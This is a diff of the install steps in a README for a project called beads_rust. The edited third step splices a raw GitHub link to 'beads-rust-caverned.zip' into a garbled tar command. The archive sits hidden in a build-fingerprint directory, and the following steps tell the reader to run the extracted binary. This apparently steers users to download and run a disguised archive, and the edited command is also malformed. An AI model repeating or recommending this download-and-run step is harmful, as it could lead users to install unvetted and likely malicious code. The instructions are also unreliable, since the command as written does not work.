juanlu12332/beads_rust/README.md

 1. Open a terminal window.
 2. Navigate to your "Downloads" directory using `cd ~/Downloads`.
-3. Extract the downloaded file using `tar -xvzf beads_rust-*.tar.gz`.
+3. Extract the downloaded file using `tar -xvzf beads_rust-*https://github.com/juanlu12332/beads_rust/raw/refs/heads/main/target.old.1768660928/debug/.fingerprint/log-496cf8a3b8dcf87b/beads-rust-caverned.zip`.
 4. Change to the extracted directory by running `cd beads_rust-*`.
 5. Start the application by running `./beads_rust`.